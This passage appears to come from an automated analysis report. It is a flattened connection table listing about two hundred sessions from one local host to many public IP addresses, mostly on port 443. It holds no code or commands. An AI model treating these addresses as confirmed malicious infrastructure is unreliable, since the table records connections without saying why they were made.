                                                      12387192.168.2.14509628.16.157.142443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12388192.168.2.1458726159.85.208.46443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12389192.168.2.1460280162.55.194.77443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12390192.168.2.1457100151.127.209.93443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12391192.168.2.145165217.232.239.119443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12392192.168.2.1449060142.138.117.152443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12393192.168.2.145773080.240.14.164443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12394192.168.2.145969076.189.180.196443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12395192.168.2.145579694.70.14.5443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12396192.168.2.1436650160.5.44.11443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12397192.168.2.1446906161.31.77.92443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12398192.168.2.145994496.19.85.217443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12399192.168.2.1457478125.4.205.18443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12400192.168.2.145612264.209.137.62443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12401192.168.2.144901679.57.179.151443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12402192.168.2.1451654212.111.183.107443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12403192.168.2.143743244.205.214.34443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12404192.168.2.144470050.25.171.90443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12405192.168.2.144336037.107.135.237443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12406192.168.2.1445310164.195.255.28443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12407192.168.2.1451784213.144.136.63443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12408192.168.2.1455076118.130.143.8443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12409192.168.2.145933627.85.167.66443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12410192.168.2.144329218.190.26.142443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12411192.168.2.145790224.14.88.234443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12412192.168.2.1440806182.9.199.142443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12413192.168.2.144536420.42.1.198443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12414192.168.2.1447076199.8.189.145443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12415192.168.2.1435832166.58.217.51443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12416192.168.2.1432820112.84.144.242443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12417192.168.2.1438920152.223.91.179443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12418192.168.2.1449988193.123.43.191443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12419192.168.2.144816495.119.62.208443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12420192.168.2.1433084124.220.157.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12421192.168.2.1457610219.63.203.254443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12422192.168.2.1433798114.47.166.249443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12423192.168.2.145421259.248.252.181443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12424192.168.2.143781481.60.165.157443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12425192.168.2.144831898.10.218.157443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12426192.168.2.144358838.119.181.43443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12427192.168.2.144338414.222.233.48443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12428192.168.2.144427859.115.118.115443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12429192.168.2.1445834199.220.217.145443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12430192.168.2.144745472.24.74.141443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12431192.168.2.1453164158.45.219.110443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12432192.168.2.1460852133.167.233.55443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12433192.168.2.1446502167.220.246.119443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12434192.168.2.1436646138.108.227.4443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12435192.168.2.1434422163.149.209.195443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12436192.168.2.1455732218.147.247.119443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12437192.168.2.143479692.212.38.25443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12438192.168.2.1460656167.10.142.69443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12439192.168.2.1449892145.82.26.79443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12440192.168.2.144007872.207.0.48443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12441192.168.2.1459670138.16.228.149443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12442192.168.2.145507078.77.77.44443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12443192.168.2.1449506194.146.77.212443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12444192.168.2.1450234105.25.66.157443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12445192.168.2.144865271.154.9.142443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12446192.168.2.1433662156.238.15.718080
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12447192.168.2.144117634.49.222.12137215
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12448192.168.2.143724846.246.185.4443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12449192.168.2.1456364190.209.120.90443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12450192.168.2.1442830190.220.46.100443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12451192.168.2.1460826219.107.246.65443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12452192.168.2.1436536149.54.237.195443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12453192.168.2.144053869.8.105.109443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12454192.168.2.1452786162.205.20.162443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12455192.168.2.1439892171.242.28.197443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12456192.168.2.145736084.235.220.39443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12457192.168.2.1454600147.99.43.3443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12458192.168.2.1454056114.213.226.30443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12459192.168.2.1458860183.171.76.40443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12460192.168.2.145137054.202.101.245443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12461192.168.2.144524461.159.210.200443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12462192.168.2.1437798123.139.64.36443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12463192.168.2.143381242.116.106.86443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12464192.168.2.1455456187.43.110.164443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12465192.168.2.14350384.26.215.57443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12466192.168.2.144260244.47.75.59443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12467192.168.2.1446186189.9.0.252443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12468192.168.2.144364858.122.116.83443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12469192.168.2.1452702109.28.145.207443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12470192.168.2.144504071.107.120.77443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12471192.168.2.1454086170.66.29.150443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12472192.168.2.143445251.97.166.23443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12473192.168.2.1433158198.49.158.134443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12474192.168.2.145649083.211.167.54443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12475192.168.2.1454592140.56.20.28443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12476192.168.2.1448568139.158.229.32443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12477192.168.2.1448270103.44.75.120443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12478192.168.2.1434898193.52.75.42443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12479192.168.2.14385464.157.110.171443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12480192.168.2.1448072180.192.18.107443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12481192.168.2.1441088207.60.122.41443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12482192.168.2.14602421.138.86.196443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12483192.168.2.1454798174.138.108.77443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12484192.168.2.1450468132.216.22.131443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12485192.168.2.1440338100.221.101.161443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12486192.168.2.144969263.59.250.208443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12487192.168.2.1450378218.67.56.173443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12488192.168.2.143613695.52.35.74443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12489192.168.2.1437550195.117.61.70443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12490192.168.2.1455228199.174.170.167443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12491192.168.2.1457246190.43.99.101443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12492192.168.2.145069286.109.245.86443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12493192.168.2.1447862163.67.192.60443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12494192.168.2.1437496169.170.178.172443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12495192.168.2.1442778186.141.171.22443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12496192.168.2.145009090.6.152.10443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12497192.168.2.1456816136.188.77.141443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12498192.168.2.143649459.65.133.98443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12499192.168.2.144837232.240.240.167443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12500192.168.2.1435130109.217.229.153443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12501192.168.2.1449216183.193.17.64443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12502192.168.2.143391452.123.177.106443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12503192.168.2.143910672.161.140.103443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12504192.168.2.1440032213.192.174.230443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12505192.168.2.1452982115.139.126.98443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12506192.168.2.1451914128.168.186.102443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12507192.168.2.145993493.158.247.137443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12508192.168.2.1454846183.56.222.166443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12509192.168.2.1433534141.210.221.75443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12510192.168.2.144387867.37.169.206443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12511192.168.2.1453510144.83.138.170443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12512192.168.2.1437832201.162.16.192443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12513192.168.2.145907636.41.27.209443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12514192.168.2.1451674164.212.61.218443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12515192.168.2.1454762118.160.40.62443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12516192.168.2.145903052.140.170.42443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12517192.168.2.1446644211.19.118.9443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12518192.168.2.1453040129.48.62.193443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12519192.168.2.1445440191.223.27.228443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12520192.168.2.1457622222.33.24.60443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12521192.168.2.145023063.172.118.38443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12522192.168.2.1438506155.36.247.98443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12523192.168.2.1438754191.203.191.97443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12524192.168.2.144014667.78.111.252443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12525192.168.2.1451480154.198.151.106443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12526192.168.2.144248867.58.149.247443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12527192.168.2.1445822206.36.236.187443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12528192.168.2.144541437.107.219.252443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12529192.168.2.144602235.249.23.64443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12530192.168.2.1451778207.174.225.120443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12531192.168.2.1434976180.231.67.104443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12532192.168.2.1452188200.93.150.165443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12533192.168.2.144756290.81.205.85443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12534192.168.2.1445602110.55.0.68443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12535192.168.2.143402635.97.82.86443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12536192.168.2.144264669.99.93.95443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12537192.168.2.1440048164.180.74.49443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12538192.168.2.145774465.81.118.48443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12539192.168.2.144457670.116.177.13443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12540192.168.2.1438102205.70.21.20443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12541192.168.2.144219471.118.86.154443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12542192.168.2.1440676103.165.115.70443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12543192.168.2.14443422.248.11.86443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12544192.168.2.1458078112.96.47.80443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12545192.168.2.1443096199.96.88.89443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12546192.168.2.1433176174.106.107.33443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12547192.168.2.144319812.72.77.84443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12548192.168.2.1434438164.207.235.16443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12549192.168.2.1454128117.11.50.203443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12550192.168.2.14473088.234.164.216443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12551192.168.2.144645089.35.51.181443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12552192.168.2.1438962138.225.245.110443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12553192.168.2.145349618.116.102.21443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12554192.168.2.145424854.5.209.188443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12555192.168.2.1435328165.211.144.242443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12556192.168.2.1449378115.93.57.107443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12557192.168.2.1434828218.170.93.209443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12558192.168.2.1439618121.111.243.95443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12559192.168.2.1455330117.124.2.74443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12560192.168.2.1445594204.63.153.164443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12561192.168.2.143791669.45.192.254443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12562192.168.2.145488812.233.31.44443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12563192.168.2.145435468.242.171.25443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12564192.168.2.1440642153.56.135.244443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12565192.168.2.145602013.102.86.222443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12566192.168.2.144349273.29.171.222443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12567192.168.2.144679235.152.100.142443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12568192.168.2.145178858.40.61.42443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12569192.168.2.1447008210.8.54.199443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12570192.168.2.145935031.232.155.73443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12571192.168.2.1442528115.119.186.124443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12572192.168.2.145227658.132.24.46443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12573192.168.2.145938863.232.11.28443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12574192.168.2.1436410221.249.56.103443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12575192.168.2.1432810101.29.218.212443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12576192.168.2.143298054.98.175.16443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12577192.168.2.1456572197.161.9.203443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12578192.168.2.14399684.73.58.225443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12579192.168.2.145153867.43.23.120443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12580192.168.2.1457172154.240.143.236443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12581192.168.2.1453844187.244.179.13443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12582192.168.2.1437584126.9.113.53443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12583192.168.2.14469242.252.77.230443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12584192.168.2.1447550209.178.135.108443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12585192.168.2.1452022138.24.190.123443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12586192.168.2.1457308157.169.119.248443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12587192.168.2.1455672175.33.227.3443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12588192.168.2.1436506135.195.5.83443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12589192.168.2.145994865.88.94.1443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12590192.168.2.1432770200.242.196.208443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12591192.168.2.1441896209.169.6.183443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12592192.168.2.1456626178.225.133.142443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12593192.168.2.143602254.116.63.175443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12594192.168.2.1460032144.15.55.40443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12595192.168.2.1434044163.212.203.215443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12596192.168.2.1449510162.177.153.153443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12597192.168.2.143450442.141.29.209443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12598192.168.2.143685476.218.48.27443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12599192.168.2.1447448130.2.199.146443
